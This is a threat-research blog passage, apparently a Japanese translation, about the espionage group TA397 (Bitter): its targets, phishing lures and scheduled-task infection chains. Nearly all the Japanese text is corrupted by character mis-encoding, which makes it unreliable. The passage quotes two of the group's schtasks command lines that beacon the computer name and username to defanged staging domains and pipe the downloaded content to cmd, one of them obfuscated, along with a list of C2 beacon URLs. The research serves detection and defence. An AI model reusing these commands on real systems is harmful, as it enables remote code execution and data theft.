ãã®ããã°ã¯2éšæ§æã®ã·ãªãŒãºã§ãããThreatrayãšã®å ±åç ç©¶ã®ææã詳述ãããã®ã§ããããŒã2ã¯Threatrayã®ãŠã§ããµã€ãã§å ¬éãããŠããŸãã
ã¢ããªã¹ã泚èšïŒæ¬ããã°å šäœã«ãããŠããªãµãŒãã£ãŒã¯TA397ã管çããã€ã³ãžã±ãŒã¿ãŒã®ç¡å¹åããèª¿æ»ææ³ä¿è·ã®ããã«äžéšæè¡ç詳现ã®ä¿®æ£ãè¡ã£ãŠããŸãã
äž»ãªèª¿æ»çµæ
- ãã«ãŒããã€ã³ãã®è åšãªãµãŒãããŒã ã¯ãTA397ãã€ã³ãåœå®¶ã®å©çã®ããã«æ å ±åéãä»»åãšããåœå®¶æ¯æŽåã®æ»æã°ã«ãŒãïŒè åšã¢ã¯ã¿ãŒïŒã§ããå¯èœæ§ãéåžžã«é«ããšè©äŸ¡ããŠããŸãã
- åœè©²ã°ã«ãŒãã¯ãã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãèªã¿èŸŒãé ä¿¡ææ³ãé »ç¹ã«å€æŽããŠããŸããããããæçµçã«çæãããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãPHP URLãã¿ãŒã³ãããŒã³ã³ã«å«ãŸãã被害è ã®ã³ã³ãã¥ãŒã¿åããŠãŒã¶ãŒåããLetâs EncryptãèšŒææžã䜿çšããæ»æè ãµãŒããŒãªã©ã¯ãã°ã«ãŒãã®æŽ»åãæ€åºããããã§é«ãä¿¡é Œæ§ãæã€æçŽãšãªããŸãã
- TA397ã¯ãäžåœãããã¹ã¿ã³ãããã³ã€ã³ãäºå€§éžã®ä»ã®è¿é£è«žåœã«é¢å¿ãæã€ãšãŒãããã®çµç¹ãå£äœãé »ç¹ã«æšçãšããŠããŸãã
- TA397ã®ãããŒããŒãæäœããŒã¹ã®æŽ»åããã€ã³ãã©éçšã¯ãã€ã³ãæšæºæïŒISTïŒã®æšæºå€åæéãšäžèŽããŠããŸãã
æŠèŠ
TA397ïŒå¥åïŒBitterïŒã¯ãåã¢ãžã¢ã®çµç¹ãé·å¹ŽæšçãšããŠããã¹ãã€ã°ã«ãŒãã§ãããã®ã°ã«ãŒãã¯ãã°ãã°éå ¬éã®åœ¢ã§ã€ã³ãã«ã¢ããªãã¥ãŒã·ã§ã³ïŒæ»æè ã®çŽã¥ãïŒããããŸããããã®æ ¹æ ã¯æç¢ºã«èšé²ãããŠããŸãããæ¬ããã°ã§ã¯ãTA397ãã€ã³ãã«é¢ä¿ããæ»æã°ã«ãŒãã§ããããšã瀺ã蚌æ ãæç€ºãããšãšãã«ããããŸã§é瀺ãããŠããªãã£ãã¢ãžã¢ä»¥å€ã®æšçã«é¢ããæ å ±ãå ¬éããŸãã
ãã®ã·ãªãŒãºã®ããŒã1ã§ã¯ãTA397ã®ãã£ã³ããŒã³ãæšçããã«ãŠã§ã¢ã®é ä¿¡æ¹æ³ãåæããã°ã«ãŒãã®ã€ã³ãã©ã«é¢ãã詳现ãªèª¿æ»çµæã玹ä»ããŸããããŒã2ã§ã¯ãTA397ã䜿çšããŠãããã«ãŠã§ã¢å šäœã®åæã«èžã¿èŸŒã¿ãåã°ã«ãŒãã®è«å ±æŽ»åã«ãããæè¡çèœåãæããã«ããŸãã
æ¬ç ç©¶ã¯ããã«ãŒããã€ã³ããšThreatrayã®ãªãµãŒãã£ãŒã«ããå ±åãªãµãŒãã§ãããTA397ãæ å ±åéãä»»åãšããã¹ãã€åã®åœå®¶æ¯æŽã¢ã¯ã¿ãŒã§ãããšãã䞻匵ãè£ä»ããããšãç®çãšããŠããŸãã
TA397ã®ãªãã¬ãŒã·ã§ã³
ãã®ã»ã¯ã·ã§ã³ã§ã¯ã2024幎10æãã2025幎4æã«ãããŠãã«ãŒããã€ã³ãã®è åšãªãµãŒãããŒã ã芳枬ããTA397ã«ãããã®ãšå€æããããã€ãã®æ»æãã£ã³ããŒã³ã玹ä»ããŸããæ¬ããã°ã®ããŒã1ã§èšåãããã¹ãŠã®æ»æãã£ã³ããŒã³ã¯ãã®æéå ã«å®æœããããã®ã§ãã
ããã§ã¯ãã°ã«ãŒããæšçãšãã察象ããã£ãã·ã³ã°ã¡ãŒã«ã®é ä¿¡ã«äœ¿ãããã¡ãŒã«ã¢ã«ãŠã³ãã®çš®é¡ãæ£èŠã®éä¿¡ã«çŽããããããã«äœ¿ãããä»¶åãæšçãæ·»ä»ãã¡ã€ã«ããªã³ã¯ã«åŒã蟌ãŸããããèšèšãããèªå°æå£ããããŠé¢å¿å¯Ÿè±¡ã«å¯Ÿãããã«ãŠã§ã¢ãå±éããææãã§ãŒã³ãåãäžããŸãã
ãŸãããã«ãŒããã€ã³ãã¯ãã®ã°ã«ãŒãã«ãããããŒããŒãæäœããŒã¹ãã®æŽ»åã«é¢ããç¬èªã®ç¥èŠãæããŠãããæ¬ããã°ã«æ²èŒãããããŒã¿ã¯è¢«å®³è ã®ç¹æ§ãæ°ããªèŠç¹ã§åæã§ããæ å ±ãæäŸããŸããããã«ãããã°ã«ãŒãããããŸã§ææžåãããŠãããããåºç¯ãªæ å ±åé察象ãæã£ãŠããããšãæããã«ãªããŸãã
æ»æãã£ã³ããŒã³ã被害察象ãèªå°æå£
TA397ã®æŽ»åãé·æéã«ããã远跡ã»åæããããšã§ãåã°ã«ãŒãã瀺ãäžé£ã®è¡åãã¿ãŒã³ãæããã«ãªã£ãŠããŸããããããã®ãã¿ãŒã³ã¯ããªãµãŒãã£ãŒã«ãšã£ãŠTA397ã®æŽ»åãç£èŠã»æ€åºããããã§å€ãã®æ©äŒãæäŸããŸãã
ãã«ãŒããã€ã³ãã®èŠ³æž¬ã«ãããšãTA397ã¯ããå°æ°ã®å¯Ÿè±¡ã«å¯ŸããŠé »ç¹ã«æ»æã仿ããŠããŸããå°ççã«ã¯ããã®æšçã¯äž»ã«äžåœãŸãã¯ã€ã³ãã®è¿é£åœãšé¢ä¿ãæã€ãšãŒãããã®çµç¹ã«éå®ãããŠãããäžåœããã³åç±³ã«ãããäºäŸãäžéšç¢ºèªãããŠããŸãããããã¯ã芳枬ç¯å²ã®åããåæ ããŠããå¯èœæ§ããããŸãããå ¬ã«å ±åãããŠããå€ãã®TA397ã®æŽ»åã¯ã¢ãžã¢ã«ãããæšçã«é¢ãããã®ã§ãã
芳枬ãããæšçã®æ¥çš®ããã¹ãã€æŽ»åã«ç¹åããæ»æã°ã«ãŒãã®å žåçãªç¹åŸŽã瀺ããŠããŸããæ¿åºæ©é¢ãå€äº€æ©é¢ãé²è¡é¢é£å£äœãªã©ãé »ç¹ã«æ»æå¯Ÿè±¡ãšãªã£ãŠãããå€äº€æ¿çãæäºåé¡ã«é¢ããæ å ±åéã«å ããæ¿æ²»çç«å Žã貿æäº€æžãé²è¡å¥çŽãçµæžæè³ã«é¢ããæææ±ºå®ããã»ã¹ãžã®æŽå¯ãåŸãããã®ææ®µãšèããããŸãã
æ»æã°ã«ãŒãã®åºèº«åœãšæšå®ãããåœã®å°æ¿åŠçãçµæžçãè»äºçé¢å¿ãšç §ããåããããšãæšçãä»¶åãèªå°ææžã¯ããããã€ã³ãåœå®¶ã®æ å ±åéã®å©çã«åèŽããŠããŸãã
TA397ã¯ã倿°ã®ç°ãªãã¡ãŒã«ã¢ã«ãŠã³ãã䜿çšããŠäœæŠãå±éããŠããŸãããããŸã§ã«ã163[.]comã126[.]comãProtonMailãšãã£ãããªãŒã¡ãŒã«ãµãŒãã¹ã®å©çšããããã¹ã¿ã³ããã³ã°ã©ãã·ã¥ãããã¬ã¹ã«ã«ã®æ¿åºæ©é¢ã®ã¢ã«ãŠã³ãã䟵害ããŠå©çšããäŸã確èªãããŠããŸãã
ãããã®ãã£ã³ããŒã³ã®äžã§ãTA397ã¯äžåœæ¿åºãã¢ãŒãªã·ã£ã¹å€§äœ¿é€šïŒäžåœæåšïŒãããã¬ã¹ã«ã«å€§äœ¿é€šïŒåæ§ã«äžåœæåšïŒãéåœå€äº€éšãå京åžã®å€äºåŒå ¬å®€ãªã©ãããŸããŸãªæ¿åºé¢é£çµç¹ã«ãªãããŸããããã¡ãŒã«ãåœè£ ãããããŠããŸããã
TA397ã®éä¿¡è ã¢ã«ãŠã³ãã§äœ¿çšãããä»¶åããã¯ãã°ã«ãŒãèªèº«ãŸãã¯æšçã®é¢å¿ã«å³ããããŒããã€ãã³ãããããããŸãã以äžã¯ããã«ãŒããã€ã³ããTA397ã®ãã£ã³ããŒã³ã§ç¢ºèªããä»¶åã®äžäŸã§ãïŒ
- AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS AT THE LEVEL OF EXTERNAL REPRESENTATIONSïŒå€éšä»£è¡šæ©é¢ã«ãããECDãšãŒãžã§ã³ãã®å¥ç޿޿°ã«é¢ããæ¿èªïŒ
- PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCARïŒ2025幎ããã¬ã¹ã«ã«å ¬å ±æè³ãããžã§ã¯ãïŒ
- SituationNote : SouthKorea_Martial law Seoul Embassy AdvisoryïŒç¶æ³å ±åïŒéåœã»ãœãŠã«å€§äœ¿é€šã®æå³ä»€ã«é¢ããå©èš ïŒ
- Invitation Embassy of the Islamic Republic of Pakistan Beijing Dec 2024.ïŒããã¹ã¿ã³ã»ã€ã¹ã©ã å ±ååœå京倧䜿通ããã®æåŸ ç¶2024幎12æ ïŒ
- EU DelegationïŒEUä»£è¡šå£ ïŒ
- Key National Defense R&D ProjectsïŒäž»èŠãªåœå®¶é²è¡ç ç©¶éçºãããžã§ã¯ã ïŒ
- Note from Embassy of Mauritius 13 December 2024ïŒã¢ãŒãªã·ã£ã¹å€§äœ¿é€šããã®ã¡ã¢ïŒ2024幎12æ13æ¥ïŒïŒ
- Fw:Fw:CN_5896_File_vers1
- Fw: A/c Records : BeijingïŒå£åº§èšé²ïŒå京 ïŒ
- Fw: Preferential Visa Rules Updates 2025ïŒ2025幎åªå ãã¶èŠåã®æŽæ° ïŒ
- Protocol Guidelines for Diplomatic MissionsïŒå€äº€äœ¿ç¯å£ã®ããã®ãããã³ã«ã¬ã€ãã©ã€ã³ ïŒ
- Department of Northeast Asia, Ministry of Foreign AffairsïŒå€åçæ±åã¢ãžã¢å± ïŒ
- Invitation Armed Forces DayïŒæŠè£ éšéã®æ¥ãæåŸ ç¶ ïŒ
- Re: Intermediate structure WA'sïŒReïŒäžéæ§é WA's ïŒ
- Ministry of Commerce FileïŒååçãã¡ã€ã«ïŒ
ã¹ãã€æŽ»åãå°éãšããæ»æã°ã«ãŒãã¯ããã°ãã°æ¿æ²»ãå€äº€ã貿æãæè³ãé²è¡ãšãã£ãåéã§æŽ»åããŸãããã«ãŒããã€ã³ããææ¡ããŠããTA397ã®æŽ»åå 容ãèžãŸãããšããã®ã°ã«ãŒããäŸå€ã§ã¯ãããŸãããäžè¿°ã®éãããšãŒãããã®å€äº€é¢é£çµç¹ã«é¢ä¿ãããšèŠãããããŒããæ±ã£ãä»¶åã確èªãããŠããŸãããŸããäžåœãããã¹ã¿ã³ãåæ±ã¢ãžã¢ã«ãããå€äº€ãè»äºåé¡ã«é¢é£ããä»¶åã倿°èŠåããããŸãã
2024幎12æã«éåœå€§çµ±é ãæå³ä»€ãçºä»€ãã屿©ã®ææã«åããããã£ã³ããŒã³ã®äžäŸã§ã¯ããSituationNote : SouthKorea_Martial law Seoul Embassy AdvisoryïŒç¶æ³éç¥ïŒéåœã»æå³ä»€ ãœãŠã«å€§äœ¿é€šããã®å©èšïŒããšããä»¶åã䜿ãããŠãããæ»æã°ã«ãŒããããã«ããŠæäºæ§ã®é«ãããŒãããæšçãã¡ãŒã«åä¿¡ç®±ã§ç®ã«ããããå 容ãå©çšããŠãæ£èŠã®ã¡ãŒã«éä¿¡ã«çŽã蟌ãããšããŠããããããããããŸãã
TA397ã®èåŸã«ãããšçãããå¢åãèãããšãç¹ã«æ³šç®ãã¹ããã£ã³ããŒã³ã2ã€ãããŸãã1ã€ã¯ãPUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCARïŒ2025幎 å ¬å ±æè³ãããžã§ã¯ã _ ããã¬ã¹ã«ã«ïŒãããã1ã€ã¯ãNote from Embassy of Mauritius 13 December 2024ïŒã¢ãŒãªã·ã£ã¹å€§äœ¿é€šããã®éç¥ 2024幎12æ13æ¥ïŒããšããä»¶åã®ãã®ã§ãããããã¯ãããããTA397ãããããããã¬ã¹ã«ã«å€§äœ¿é€šãã¢ãŒãªã·ã£ã¹å€§äœ¿é€šããéãããæ£èŠã®ã¡ãŒã«ã§ãããã®ããã«è£ ã£ãŠããããšã瀺ããŠããŸãïŒãã ããã¢ãŒãªã·ã£ã¹å€§äœ¿é€šãåä¹ããã£ã³ããŒã³ã§ã¯ãéä¿¡å ãšããŠäžåœã®ããªãŒã¡ãŒã«ã¢ãã¬ã¹ã䜿ãããŠããŸããïŒã

RARã§å²ãŸããCHMæ·»ä»ãã¡ã€ã«ãå«ãTA397ã«ã¢ãŒã¡ãŒã«ïŒããšãã¡ãŒã«ïŒã®äŸ
ãã®ãããªæšçèšå®ã¯ãããã¬ã¹ã«ã«ããã³ã¢ãŒãªã·ã£ã¹ã®äž¡åœãã€ã³ãã«ãšã£ãŠæŠç¥çãªããŒãããŒã§ããããšãåæ ããŠããå¯èœæ§ããããŸããäž¡åœãšã®é¢ä¿ã¯ã貿æããšãã«ã®ãŒãã€ã³ãã©ãªã©å€å²ã«ããã£ãŠããŸããããã«ã2024幎åé ãã2025幎ã«ãããŠãã€ã³ãã¯ããã¬ã¹ã«ã«ããã³ã¢ãŒãªã·ã£ã¹ãšè€æ°åã«ãããããå ±åæµ·è»æŒç¿ãå調ããããŒã«ãæ å ±å ±æãäººéæ¯æŽã»çœå®³ææŽïŒHADRïŒæŽ»åãèœåæ§ç¯ããã®ä»ã®å€äº€çåãçµã¿ããè¡ã£ãŠããŸããã
ãã£ã³ããŒã³ã«å«ãŸããå 容ãããšãææžã®æ§æãããTA397ãã€ã³ãã®åçåœãå«ãä»åœæ¿åºãè£ ãããšã«å šãããããããªãããšãæããã§ãããããã®ãã£ã³ããŒã³ã«ãããTA397ã®æšçã¯ããšãŒãããã«æ ç¹ãæã€ãã«ã³ããã³äžåœã®çµç¹ã§ãããããã®ããšã¯ãåã°ã«ãŒããããã¬ã¹ã«ã«ããã³ã¢ãŒãªã·ã£ã¹ã®æ£èŠã®å€äº€æŽ»åã«ã€ããŠååãªç¥èãšææ¡åãæããŠããããããã¹ãã¢ãã£ãã·ã³ã°æ»æã«æªçšããŠããããšã瀺åããŠããŸãã
å€ãã®ã¹ãã€æŽ»åã«ç¹åããæ»æã°ã«ãŒãã¯ãåæäŸµå ¥çšã®ãã€ããŒãã«å ããŠãããšãææžãæ·»ä»ãã¡ã€ã«ããããã¯åœè£ ãªã³ã¯ãéä¿¡ããæšçãæ¬ºããŠã¡ãŒã«ã®æ£åœæ§ãä¿¡ã蟌ãŸããããšããŸããããããéå»1幎éã«ãããŠããã«ãŒããã€ã³ããTA397ã«ãããã®ææ³ã確èªããã®ã¯2ä»¶ã®ã¿ã§ããã1ä»¶ã¯ãã«ã³ã®é²è¡ç£æ¥é¢é£çµç¹ãæšçãšãããæ¢ã«å ¬éæžã¿ã®ãã£ã³ããŒã³ã§ããããã1ä»¶ã¯äžåœã«æåšãããšãŒãããç³»çµç¹ãæšçãšãããã£ã³ããŒã³ã§ãã

æªæã®ããæ·»ä»ãã¡ã€ã«ãå«ããã£ãã·ã³ã°ã¡ãŒã«ã«æ£åœæ§ãæãããããã®åœããšãææž
TA397ãå®è¡ããŠãããã®ä»ã®ãã£ã³ããŒã³ã§ã¯ãåºæ¬çã«æ¬æããã¬ãŒã³ããã¹ãã®ã¡ãã»ãŒãžã§æ§æãããŠãããåã°ã«ãŒãã¯æ£èŠã®æ¿åºæ©é¢ãè£ ã£ãŠããŸããããã®ã¡ãŒã«ã«ã¯ãæªæã®ããæ·»ä»ãã¡ã€ã«ãURLãåå°ãããŠããŸããã
ãã®ãããªææ³ã®éžæã¯ãä»ã®å€ãã®åœå®¶æ¯æŽåæ»æã°ã«ãŒããšæ¯èŒããŠãTA397ã®ãã£ãã·ã³ã°æŽ»åãå šäœãšããŠæçåºŠã«æ¬ ããŠããããšã瀺ããŠããŸãã
ææãã§ãŒã³
TA397ã¯é«åºŠãªæè¡åãèªã£ãŠããããã§ã¯ãããŸããããéåžžã«æŽ»çºã§ãé »ç¹ãã€ç¶ç¶çã«ãã£ã³ããŒã³ã宿œããŠããŸããåã°ã«ãŒãã¯åºæ¬çãªæ»æææ³ã確ç«ããŠããããããç¹°ãè¿ã䜿çšããŠããŸãããæ€ç¥åé¿ãè匱æ§ã®æªçšãç®çãšããŠãæ°ããææãã§ãŒã³ã®å®éšãè¡ã£ãŠããŸãã
åæäŸµå ¥
TA397ã¯åæã¢ã¯ã»ã¹ææ³ãšããŠã¹ãã¢ãã£ãã·ã³ã°ãæãå€çšããŠãããä»ã®ææ³ãçšãããšããå ±åã¯çŸåšãŸã§ç¢ºèªãããŠããŸããããã ããåã°ã«ãŒãã®ã¹ãã¢ãã£ãã·ã³ã°æŠè¡ã¯é²åããŠãããæè»æ§ã瀺ããŠããŸãã
2019ã2020å¹Žåœæã¯ãCVEã®æªçšãArtraDownloaderãå©çšãã远å ãã€ããŒãã®å±éãããã«ã¯Androidãã«ãŠã§ã¢ ã®å®éšã確èªãããŠããŸããããè¿å¹Žã§ã¯ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã®å©çšã«äžè²«ããŠåŸåããŠããŸããããã¯ãã«ãŒããã€ã³ã, Ahnlab, StrikeReady Labs, Cisco Talosãªã©è€æ°ã®çµç¹ãå ±åããŠããŸãã
éå»ã®äºäŸã§ã¯ãArtraDownloaderãææç«¯æ«ã®ãŠãŒã¶ãŒåãšã³ã³ãã¥ãŒã¿åãHTTP(S) POST C2 ããŒã³ã³å ã«ãšã³ã³ãŒãããŠããããããC2ãµãŒããŒã«å®æçã«éä¿¡ãããŠããŸãããæ»æè ã¯ãã®æ å ±ãæåã§åæããæšçãæ¡ä»¶ãæºãããŠããã°ç¬¬äºæ®µéã®ãã€ããŒããé ä¿¡ãããšããæµãã§ããçŸåšã§ãTA397ã¯ãããšåæ§ã®ã¢ãããŒããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãéããŠå®æœããŠããŸãã
ãã«ãŒããã€ã³ãã芳枬ãããã£ã³ããŒã³ã«ãããã¡ãŒã«ã«ã¯ãéåžžãçŽæ¥æ·»ä»ããããã¡ã€ã«ããããã¯æ£èŠã®ãã¡ã€ã«å ±æãµãŒãã¹ãå©çšããŠãã¡ã€ã«ãé ä¿¡ããURLã®ãããããå«ãŸããŠããŸããããããŠããã®ãã¡ã€ã«ãå®è¡ãããããšã§ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãèµ·åããä»çµã¿ãšãªã£ãŠããŸããã
ããšããã¡ã€ã«ãã¡ãŒã«ã«çŽæ¥æ·»ä»ãããŠããå Žåã§ããæçµçã«ã¯ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã®äœæã«ã€ãªãã£ãŠããŸãããããã«äžéšã®ã±ãŒã¹ã§ã¯ãæ»æè ãããé«åºŠãªææ³ã詊ã¿ãäžã§ããã¡ã€ã«ãå®è¡åã«ã¢ãŒã«ã€ã圢åŒã«ãŸãšããŠéä¿¡ããã±ãŒã¹ã確èªãããŠããŸãã
ããšãã°ã2024幎åŸåãNTFSãã¡ã€ã«ã·ã¹ãã äžã§ä»£æ¿ããŒã¿ã¹ããªãŒã ïŒADSïŒã®å©çšãè¡ãããçŽåŸã«ããã«ãŒããã€ã³ãã¯TA397ãç¹æ®ãªãã¡ã€ã«åœ¢åŒã䜿çšããŠããããšã芳枬ããŸãããããã¯ãMicrosoft Search ConnectorïŒMSCïŒãã¡ã€ã«ããšåŒã°ãããã®ã§ããŠãŒã¶ãŒãWebãµãŒãã¹ããªã¢ãŒãã¹ãã¬ãŒãžäžã«ä¿åãããããŒã¿ãžæ¥ç¶ããããšãå¯èœã«ãããã®ã§ãã
ãã®MSCãã¡ã€ã«ã®äœ¿çšã¯ãTA397ã«ãšã£ãŠæ°ããªæŠè¡ã§ãããææããããã·ã³äžã«LNKãã¡ã€ã«ãé 眮ã»å®è¡ãããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãäœæãããšãããã®ã§ããããã®ææãã§ãŒã³ã®è©³çްããã®åŸã®ããŒããŒãã«ããæåæäœïŒhands-on-keyboardïŒæŽ»åã«ã€ããŠã¯ã以äžã§ããã«è©³ãã説æãããŠããŸãã
ãã®Search Connectorã¯Microsoftã®XMLãã¡ã€ã«ã§ãããã©ã€ãã©ãªãã¡ã€ã«ãä¿åæžã¿æ€çŽ¢ãã¡ã€ã«ãšåæ§ã®æ¹æ³ã§æªçšãããŸããWebDAVãå©çšããŠãã€ããŒããããŠã³ããŒãããææ³ã¯ãé廿°å¹Žéã§è€æ°ã®è åšã°ã«ãŒãã«ãã£ãŠå©çšããããã¬ã³ããšãªã£ãŠããããã®Search Connectorã®ææ³ã«ã€ããŠãã2023幎ã«ã¯ã»ãã¥ãªãã£ãªã¹ã¯ãšããŠå ±åãããŠããŸãããããããTA397ã«ãããã®ææ³ã®åããŠã®äœ¿çšã確èªãããã®ã¯ã2024幎åŸåã®ããšã§ããã
å¥ã®äŸã§ã¯ãMSCãã¡ã€ã«ãå«ãã RARã¢ãŒã«ã€ããæ·»ä»ãããã¡ãŒã«ã芳枬ããããŠãŒã¶ãŒãMSC ãã¡ã€ã«ãå®è¡ãããšmmc.exeãèµ·åããPowerShellã䜿ã£ãŠæ¬¡æ®µéã®ãã€ããŒããããŠã³ããŒãã»å®è¡ããã¿ã¹ã¯ãäœæããããšãããã®ã§ããããã®æ»æã§ã¯ãmmc.exeã®ã³ã³ããã¹ãã§ãªã¢ãŒãã³ãŒãå®è¡ãå¯èœãšããCVE-2024-43572ïŒéç§°GrimResourceïŒãæªçšããŠããŸããã
TA397ã¯ãããæ°å¹Žã«ããããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãäœæãŸãã¯é 眮ããããã®ããŸããŸãªææ³ã詊è¡ããŠããŸãããããããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãã®ãã®ã®å 容ã«ã€ããŠã¯ãã»ãšãã©å€æŽãããŠããªãããšã確èªãããŠããããã®ç¹ã«ã€ããŠã¯æ¬¡ã®ã»ã¯ã·ã§ã³ã§è©³ãã解説ããŸãã
cmd.exeãPowerShellãä»ããŠã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãèµ·åããããã«äœ¿çšããããã¡ã€ã«åœ¢åŒãšããŠã¯ãMSCãã¡ã€ã«ãLNKãã¡ã€ã«ãCHMãã¡ã€ã«ãMicrosoft Accessãã¡ã€ã«ãIQYãã¡ã€ã«ãªã©ãããŸããŸãªçš®é¡ã確èªãããŠããŸãã
ãã«ãŒããã€ã³ãã2021幎ããTA397ã®è¿œè·¡ãéå§ããŠä»¥éãåã°ã«ãŒãããŒããã€è匱æ§ãæªå ¬éã»æªå ±åã®æè¡ã䜿çšãã圢跡ã¯èŠ³æž¬ãããŠããŸãããããããTA397ã¯ãè åšååãæ³šèŠããªãããå®éã«å¹æããããšç¢ºèªããããå®çªã®ãåæäŸµå ¥çšãã€ããŒãã®ææ³ãçšããŠãããã®ãšèããããŸããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã®ææ³èªäœã¯äžè²«ããŠãããã®ã®ãæçµçãªãã€ããŒãã«ã€ããŠã¯å€æ§ãªããªãšãŒã·ã§ã³ãååšããŠããŸãïŒãã®ç¹ã«ã€ããŠã¯åŸã®ç« ã§è©³è¿°ãããŸãïŒã
以äžã®å³ã¯ã芳枬ãããåæäŸµå ¥ã®ææãã§ãŒã³ãæŠèгãããã®ã§ãã

TA397ã®ææãã§ãŒã³ã®æŠèŠ
ã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯
以äžã«ç€ºãã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã®ã³ãã³ãã©ã€ã³ã®äŸã¯ãã¿ã¹ã¯ã16åããšã«ã¹ããŒãžã³ã°ãã¡ã€ã³ãwoodstocktutors[.]comããžããŒã³ã³éä¿¡ãè¡ããæ¬¡ã®ã¹ããŒãžã®ãã€ããŒãååŸã®æç€ºãåŸ ã£ãŠããæ§åã瀺ããŠããŸãã
ãããã®ãµã³ãã«ããµã³ãããã¯ã¹ç°å¢ã§å®è¡ããå Žåã远å ã®ãã€ããŒãã¯é ä¿¡ãããŸããã§ãããããããããé·æéã«ããã£ãŠå®è¡ãç¶ç¶ãããšãæçµçã«æ¬¡ã®ã¹ããŒãžã®ãã€ããŒãããããããããŸããã
ãã®æåã¯æåã«ãããã®ãšæãããæ»æè ãããçš®ã®éžå®åºæºã«åºã¥ããŠå€æãäžããåŸã«å®è¡ãããå¯èœæ§ãé«ããšèããããŸããããšãã°ã被害è ã®IPã¢ãã¬ã¹ãã³ã³ãã¥ãŒã¿ãŒåããŠãŒã¶ãŒåãªã©ã®æ å ±ãããŒã³ã³éä¿¡ãéããŠãµãŒããŒãžéä¿¡ããããããåºã«ããŠæ»æè ãæ¬¡ã®ã¢ã¯ã·ã§ã³ã決å®ãããšã¿ãããŸãã
"C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm "woodstocktutors[.]com/jbc.php? fv=$env:COMPUTERNAME*$env:USERNAME" -OutFile "C:\\Users\\public\\kwe.cc"; Get-Content "C:\\Users\\public\\kwe.cc" | cmd"
ãã®ã°ã«ãŒãã¯ãPowerShellãåçš®ã³ãã³ãã©ã€ã³ããŒã«ïŒäŸïŒcurlãconhost ãªã©ïŒãçšããŠããŸããŸãªè©Šè¡ãè¡ããé£èªåææ³ãé§äœ¿ããŠããŸããããåºæ¬çãªæ©èœã¯äžè²«ããŠããŸããã
以äžã«ç€ºãã®ã¯ããã®äžäŸãšããŠãé£èªåãããPowerShellã³ãã³ãã䜿çšããŠäœæãããã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ã§ããããã®ã¿ã¹ã¯ã¯18åããšã«ãprincecleanit[.]comããã¡ã€ã³ã«å¯ŸããŠããŒã³ã³éä¿¡ãè¡ãããã«èšå®ãããŠããŸãã
schtasks /create /tn \\"Task-S-1-5-42121\\" /f /sc minute /mo 18 /tr \\"conhost --headless cmd /v:on /c set gz=ht& set gtz=tps:& set 7gg=!gz!!gtz!& set 6hg=!7gg!//p^rin^ce^cle^anit.co^m& c^ur^l !6hg!/d^prin.p^hp?dr=%computername%;%username%|c^m^d\\"
ãã«ãŒããã€ã³ãã®è åšãªãµãŒãã¯ãåã°ã«ãŒãã«å¯Ÿããç¶ç¶çãªè¿œè·¡ã®äžç°ãšããŠãTA397ãã¹ã±ãžã¥ãŒã«ã¿ã¹ã¯ãäœæããéã«ç¹æã®ã·ã°ããã£ïŒèå¥ãã¿ãŒã³ïŒãç¹å®ããŸããããã®ã°ã«ãŒãã¯ãã¹ããŒãžã³ã°çšã€ã³ãã©ã«åããŠéä¿¡ããPHPã®URIãªã¯ãšã¹ãããã³ã³ãã¥ãŒã¿ãŒåãšãŠãŒã¶ãŒåã®çµã¿åããã§æ§æããŠããããã®éã«ç°ãªãæåãæããªã©ã®å·¥å€«ãããŠããŸããããã¯ãããããéçæ€åºïŒã·ã°ããã£ããŒã¹ã®ã»ãã¥ãªãã£è£œåïŒãåé¿ããããšãæå³ãããã®ãšèããããŸãããã®ææ³ã¯é廿°å¹Žã«ããã£ãŠäžè²«ããŠäœ¿çšãããŠããã以äžã«ç€ºããããªæŽä»£ã®TA397ãã£ã³ããŒã³ã®äŸãããããã®ç¹åŸŽã確èªã§ããŸãã
blucollinsoutien[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME hxxp://46.229.55[.]63/svch.php?li=%computername%..%username% hxxp://95.169.180[.]122/vbgf.php?mo=%computername%--%username% hxxp://inizdesignstudio[.]com/lk.php?xm=$env:computername*$env:username hxxp://trkswqsservice[.]com/turf.php?xm=$env:COMPUTERNAME*$env:USERNAME hxxp://woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME hxxps://princecleanit[.]com/dprin.php?dr=%computername%;%username% hxxps://utizviewstation[.]com/dows.php?cb=$env:COMPUTERNAME*$env:USERNAME hxxps://www[.]headntale[.]com/lchr.php?ach=%computername:~0,15%_%username:~0,5% hxxps://www.mnemautoregsvc[.]com/GIZMO/flkr.php?sa=COMPUTERNAME**USERNAME jacknwoods[.]com/jacds.php?jin=%computername%_%username% utizviewstation[.]com/sdf.php?fv=$env:COMPUTERNAME*$env:USERNAME warsanservices[.]com/mydown.php?dnc=%username%_%computername% warsanservices[.]com/myupload.php?dnc=%username%_%computername%
ãããã®ã¹ããŒãžã³ã°ãã¡ã€ã³ã§äœ¿çšãããŠããTLSèšŒææžã調æ»ãããšããããã®ã»ãšãã©ãæšæºçãªLetâs EncryptèšŒææžã«äŸåããŠããããšã倿ããŸãããç§ãã¡ã¯ããããã®èšŒææžã«å¯ŸããŠã¿ã€ã ã¹ã¿ã³ãåæã宿œãããã®è©³çްã¯ãã€ã³ãã©åæãã»ã¯ã·ã§ã³ã§èª¬æããŠããŸãã
以äžã¯ãã¹ããŒãžã³ã°ãã¡ã€ã³ãprincecleanit[.]comãã«é¢ããäžäŸã§ãã

princecleanit[.]com TLS certificate from Censys.
äžè¬çãªç¹åŸŽã¯ä»¥äžã®éãã§ãïŒ
